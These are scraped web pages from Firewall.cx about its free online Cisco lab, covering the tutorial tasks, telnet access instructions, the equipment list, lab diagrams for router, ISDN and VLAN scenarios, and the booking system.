The 2912XL responsible for segmenting the local network, ensuring each lab is kept in its own isolated environment.


cisco-lab-pictures-7
Cisco Lab No.1 - The lab's Catalyst 1912 supporting two cascaded 1603R routers, and a 501 PIX Firewall.



cisco-lab-pictures-6
Cisco Lab No.2 - The lab's two 1603R routers.




cisco-lab-pictures-6Cisco Lab No.3 - Three high-end Cisco switches flooded in blue lighting, making VLAN services a reality.




Cisco Lab No.3 - Optical links connecting the three switches together, permitting complex STP scenarios.

  • Hits: 20936

Firewall.cx Free Cisco Lab: Tutorial Overview

The Free Cisco lab tutorials were created to help our members get the most out of our labs by providing a step-by-step guide to completing specific tasks that vary in difficulty and complexity.

While you are not restricted to these tutorials, we do recommend you take the time to read through them as they cover a variety of configurations designed to enhance your knowledge and experience with these devices.

As one would expect, the first tutorials are simple and designed to help you move gradually into deeper waters. As you move on to the rest of the tutorials, the difficulty will increase noticeably, making the tutorials more challenging.

NOTE: In order to access our labs, you will need to open TCP ports 2001 to 2010. These ports are required so you can telnet directly into the equipment.

Following is a list of available tutorials:

Task 1: Basic Router & Switch Configuration

Router: Configure router's hostname and Ethernet interface. Insert a user mode and privilege mode password, enable secret password, encrypt all passwords, configure VTY password. Perform basic connectivity tests, check nvram, flash and system IOS version. Create a banner motd.

Switch: Configure switch's hostname, Ethernet interface, System name, Switching mode, Broadcast storm control, Port Monitoring, Port configuration, Port Addressing, Network Management, Check Utilisation Report and Switch statistics.

Task 2: Intermediate Router Configuration

Configure the router to place an ISDN call toward a local ISP using ppp authentication (CHAP & PAP). Set the appropriate default gateway for this stub network and configure simple NAT Overload to allow internal clients to access the Internet. Ensure the call is disconnected after 5 minutes inactivity.

Configure Access Control Lists to restrict telnet access to the router from the local network. Create a local user database to restrict telnet access to specific users.

Block all ICMP packets originating from the Local LAN towards the Internet and allow the following Internet services to the local LAN: www, dns, ftp, pop & smtp. Ensure you apply the ACL's to the router's private interface.

Block all incoming packets originating from the Internet.

  • Hits: 29606

Firewall.cx Free Cisco Lab: Our Partners

Our Cisco Lab project is a world first; there is no other Free Cisco Lab offered anywhere in the world! Our technical specifications and the quality of our lab marks a new milestone in free online education, matching the spirit in which this site was created.

While the development of our lab continues we publicly acknowledge and thank the companies that have made this dream a reality from which you can benefit, free of charge!

Each contributor is recognised as a Gold or Silver Partner.

 

cisco-lab-partners-1

logo-gfi
cisco-lab-partners-datavision

 

 

cisco-lab-partners-2

 

cisco-lab-partners-symantecpress

 

cisco-lab-partners-ciscopress

cisco-lab-partners-prenticehall

cisco-lab-partners-addison-wesley
  • Hits: 17073

Firewall.cx Free Cisco Lab: Access and Help

Connecting to the Lab Equipment

In order to access our equipment, the user must initiate a 'telnet' session to each device. The telnet session may be initiated using either of the following two ways:

1) By clicking on the equipment located on the diagram above. If your web browser supports external applications, once you click on a diagram's device, a dos-based telnet window will open and you'll receive the Cisco Lab welcome screen.

Note: The above method will NOT work with Internet Explorer 7, due to security restrictions.

2) Manually initiating a telnet session. On each diagram, note the device port list on the lower left hand corner. These are the ports to which you need to telnet into, so you may access the equipment your lab consists of. You can either use a program of your choice, or follow the traditional dos-based window by clicking on "Start" button, go to the "Run" selection and enter "command" (Windows 95, 98, Me) or "cmd" (Windows 2000, XP, 2003). At the DOS prompt enter:

c:\> telnet ciscolab.no-ip.org xxxx

where 'xxxx' is substituted with the device port number as indicated on the diagram.

For example, if you wanted to connect to a device that users device port 2003, the following would be the command required: telnet ciscolab.no-ip.org 2003

You need to repeat this step for each equipment you need to telnet into.

Cisco 'Secret' Passwords

Each lab requires you to set the 'enable secret' password. It is imperative you use the word "cisco" ,so our automated system is able to reset the equipment for the next user.

We ask that you kindly respect this request to ensure our labs are accessible and usable by everyone.

Since all access attempts are logged by our system, users found storing other 'enable secret' passwords will be blocked from the labs and site in general.

To report any errors or inconsistencies with regards to our lab system, please use the Cisco lab forum.

With your help, we can surely create the world's friendliest and resourceful Free Cisco Lab!

  • Hits: 14870

Firewall.cx Free Cisco Lab: Setting Your Account GMT Timezone

Firewall.cx's Free Cisco Labs make use of a complex system in order to allow users from all over the world create a booking in their local timezone. Prerequisits for a successful booking is the user to have the correct GMT Timezone setting in their Firewall.cx profile, as this is used to calculate and present the current scheduling system in the user's local time.

If you are unsure what GMT Timezone you are in, please visit https://greenwichmeantime.com/ and click on your country.

You can check your GMT Timezone by viewing your account profile. This can be easily done by firstly logging into your account and then clicking on "Your Account" from the site's main module:

cisco-lab-gmt-1

 

 

 

 

 

 

 

 

Next, click on "Your Info" as shown in the screenshot below:

cisco-lab-gmt-2

 

Finally, scroll down to the 'Forums Timezone' and click on the drop-down box to make your selection.

cisco-lab-gmt-3

Once you've select the correct timezone, scroll to the bottom of the page and click on "Save Changes".

Please note that you will need to adjust your GMT Timezone as you enter/exit daylight savings throughout the year.

You are now ready to create your Cisco Lab booking!

red-line

  • Hits: 14550

Firewall.cx Free Cisco Lab: Equipment & Device List

No lab is possible without the right equipment to allow coverage of simple to complex scenarios.

With limited income and our sponsors help, we've done our best to populate our lab with the latest models and technologies offered by Cisco. Our current investment exceeds $10,000 US dollars and we will continue to purchase more equipment as our budget permits.

We are proud to present to you the following equipment that will be made available in our lab:

Routers
3 x 1600 series routers including BRI S/T, Serial and Ethernet interfaces
1 x 1720 series router including BRI S/T, Serial and Fast Ethernet interfaces
1 x 2610 series routers with BRI S/T, Wic-1T, BRI 4B-S/T and Ethernet interfaces
1 x 2612 series router with BRI S/T, Wic-1T, Ethernet and Token Ring interfaces
1 x 2620 series router with Wic-1T and Fast Ethernet interfaces
2 x 3620 series routers with BRI S/T, Wic-1T, Wic-2T, Ethernet, Fast Ethernet interfaces
1 x 1760 series router supporting Cisco Call Manager Express with Fast Ethernet & Voice Wic
1 x Cisco 2522 Frame relay router simulator
Total: 11 Routers
 
Switches
1 x 1912 Catalyst switches with older menu-driven software
1 x 2950G-12T Catalyst switch with 12 Fast Ethernet ports, 2 Gigabit ports (GBIC)
2 x 3524XL Catalyst switch with 24 Fast Ethernet ports, 2 Gigabit ports (GBIC)
Total: 4 Switches
 
Firewall
1 x Pix Firewall 501 v6.3 software
 
Other Devices/Equipment
  • Gbics for connections between catalyst switches
  • Multimode and Singlemode fiber optic cables for connection between switches
  • DB60 x-over cables to simulate leased lines
  • 420 VA UPS to ensure lab availability during power shortage
  • CAT5 UTP cables & patch cords
  • 256/128K Dedicated ADSL Connection for Lab connectivity

red-line

  • Hits: 17521

Firewall.cx Free Cisco Lab: Equipment & Diagrams

Each lab has been designed to cover specific topics of the CCNA & CCNP curriculum, but are in no way limited, as you are given the freedom to execute all commands offered by the device's IOS.

While the lab tutorials exist only as guidelines to help you learn how to implement the services and features provided by the equipment, we do not restrict their usage in any way. This effectively means that full control is given to you and, depending on the lab, a multitude of variations to the lab's tutorial are possible.

Cisco Lab No.1 - Basic Router & Switch Configuration

The first Cisco Lab involves the configuration of one Cisco 1603R router and Catalyst 1912 switch. This equipment has been selected to suit the aim of this lab, which is to serve as an introduction to Cisco technologies and concepts.

The lab is in two parts, the first one covering basic IOS functions such as simple router and switch configuration (hostname, interface IP addresses, flash backup, banners etc).

The second part focuses on ISDN configuration and dialup, including ppp debugging, where the user is required to perform a dialup to an ISP via the lab's ISDN simulator. Basic access lists are covered to help enhance the lab further. Lastly, the user is able to ping real Internet IP Addresses from the 1603R due to the fact the back end router (ISP router) is connected to the lab's Internet connection.

cisco-lab-diagrams-lab-1

 

Equipment Configuration:

Cisco Catalyst 1912
FLASH: 1MB
IOS Version: v8.01.02 Standard Edition
Interfaces:12 Ethernet / 2 Fast Ethernet

 

Cisco 1603R
DRAM / FLASH: 16MB / 16MB
IOS Version: 12.3(22)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

red-line

Cisco Lab No.2 - Advanced Router Configuration

The second Cisco lab focuses on advanced router configuration by covering topics such as WAN connectivity (leased lines) with ISDN backup functionality thrown into the package. GRE (encrypted) tunnels, DHCP services with a touch of dynamic routing protocols such as RIPv2 are also included.

As you can appreciate, the complexity here is greater and therefore the lab is split into 4 separate tutorials to ensure you get the most out of all four tutorials.

You will utilise all three interfaces available on the routers, these include Ethernet, ISDN and Serial interfaces. The primary WAN link is simulated using a back-to-back serial cable and the ISDN backup capability is provided through our lab's dedicated ISDN simulator.

cisco-lab-diagrams-lab-2

 

Equipment Configuration:

Cisco 1603R (router 1)
DRAM / FLASH: 18MB / 16MB
IOS Version: 12.3(6a)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

 

Cisco 1603 (router 2)
DRAM / FLASH: 24MB / 16MB
IOS Version: 12.3(6a)
Interfaces: 1 Ethernet / 1 Serial / 1 ISDN BRI

red-line

Cisco Lab No.3 - VLANs - VTP & InterVLAN Routing

The third Cisco lab aims to cover the popular VLAN & InterVLAN routing services, which are becoming very common in large complex networks.

The lab consists of two Catalyst 3500XL switches and one Catalyst 2950G as backbone switches, attached to a Cisco 2620 router.

Our third lab has been designed to fully support the latest advanced services offered by Cisco switches such as the creation of VLANs and configuration of the popular InterVLAN Routing service amongst all VLANs and switches.

Advanced VLAN features, such as Virtual Trunk Protocol (VTP) and Trunk links throughout the backbone switches, are tightly integrated into the lab's specifications and extend to support a number of VLAN related services just as it would in a real-world environment.

Further extending this lab's potential, we've added Etherchannel support to allow you to gain experience in creating high-bandwidth links between switches with multiple low-bandwidth interfaces (100Mbps), aggregating these links to form one large pipe (400Mbps in our example).

Lastly, STP (Spanning Tree Protocol) is fully supported. The lab guides you understand the use of STP in order to create fully redundant connections between backbone switches. You are able to disable backbone links, simulating link loss and monitoring the STP protocol, while it activates previously blocked links.

cisco-lab-diagrams-lab-3

This lab requires you to perform the following tasks:

- Basic & advanced VLAN configuration

- Trunk & Access link configuration

- VLAN Database configuration

- VTP (VLAN Trunk Protocol) Server, client and transparent mode configuration

- InterVLAN routing using a 2620 router (Router on a stick)

- EtherChannel link configuration

- Simple STP configuration, Per VLAN STP Plus (PVST+) & link recovery

 

Equipment Configuration:

Cisco 2620 (router 1)
DRAM / FLASH: 48MB / 32MB
IOS Version: 12.2(5d)
Interfaces: 1 Fast Ethernet
 
Cisco Catalyst 3500XL (switch 1)
DRAM / FLASH: 8MB / 4MB
IOS Version: 12.0(5.2)XU - Enterprise Edition Software
Interfaces: 24 Fast Ethernet / 2 Gigabit Ethernet with SX GBIC modules installed
 
Cisco Catalyst 3500XL (switch 2)
DRAM / FLASH: 8MB / 4MB
IOS Version: 12.0(5.4)WC(1) - Enterprise Edition Software
Interfaces: 24 Fast Ethernet / 2 Gigabit Ethernet with SX & LX GBIC modules installed
 
Cisco Catalyst 2950G-12-EI (switch 3)
DRAM / FLASH: 20MB / 8MB
IOS Version: 12.1(6)EA2
Interfaces: 12 Fast Ethernet / 2 Gigabit Ethernet with SX & LX GBIC modules installed
  • Hits: 30570

Firewall.cx Free Cisco Lab: Online Booking System


The Online Booking System is the first step required for any user to access our lab. The process is fairly straightforward and designed to ensure even novice users can use it without problems.

How Does It Work?

To make a valid booking on our system you must be a registered Firewall.cx user. Existing users are able to access the Online Booking System from inside their Firewall.cx account.

Once registered, you will be able to log into your Firewall.cx account and access the Online Booking System.

The Online Booking System was customised to suit our lab's needs and provide a booking schedule for all resources (labs) available to our community. Once logged in, you are able to select the resource (lab) you wish to access, check its availability and finally proceed with your booking.

There are a number of parameters that govern the use of our labs to ensure fair usage and avoid the abuse of this free service. The maximum session time for each lab depends on its complexity. Naturally, the more complex, the more time you will be allowed. When your time has expired you will automatically be logged off and the lab equipment will be reset for the next scheduled user.

Following is a number of screen shots showing how a booking is created. You will also find the user's control panel, from where you can perform all functions described here.

Full instructions are always provided by the use of our 'Help' link located on the upper right corner of the booking system's page.

The Online Booking System login page:

cisco-lab-booking-system-1

red-line

 

The booking system control panel:

cisco-lab-booking-system-2

red-line

The lab scheduler/calendar:

cisco-lab-booking-system-3

red-line

Creating a booking:

cisco-lab-booking-system-4

red-line

User control panel showing current reservations:

cisco-lab-booking-system-5

red-line

  • Hits: 21206